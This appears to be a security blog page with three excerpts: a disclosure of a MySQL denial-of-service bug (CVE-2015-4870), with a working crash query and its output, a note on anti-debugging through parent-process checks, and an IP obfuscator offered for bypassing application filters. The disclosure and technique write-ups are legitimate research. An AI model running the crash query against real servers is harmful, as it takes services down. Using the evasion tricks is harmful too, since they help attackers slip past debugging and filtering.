MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:
[code language=”sql”]
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);
[/code]
So an Example POC would be:
[code language=”sql”]
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
[/code]
[code language=”sql”]
—————————————————————————————————————
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect…
ERROR 2003 (HY000): Can’t connect to MySQL server on ‘localhost’ (10061)
ERROR:
Can’t connect to the server

mysql>
—————————————————————————————————————
[/code]

View post on imgur.com


(more…)

Parent Process Detection

By checking the parent process of a given process we can determine if the process is being debugged or not by expecting “explorer.exe” to be the usual parent process started by the user.
For this technique the following Windows APIs are used.

We also use a pointer to PROCESSENTRY32 structure which will store the information of each process taken from the snapshot.

[code language=”C”]
typedef struct tagPROCESSENTRY32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
ULONG_PTR th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
TCHAR szExeFile[MAX_PATH];
} PROCESSENTRY32, *PPROCESSENTRY32;
[/code]

(more…)

IP Obfuscator

A simple tool to convert the IP to different obfuscated forms written in C by me 🙂 I just wrote this for fun. You may use this when it comes bypassing application filters and much more 🙂

View post on imgur.com

Example:
IP address of http://google.lk : http://222.165.163.91
Other forms you can write the same IP:

[+] http://3735397211
(more…)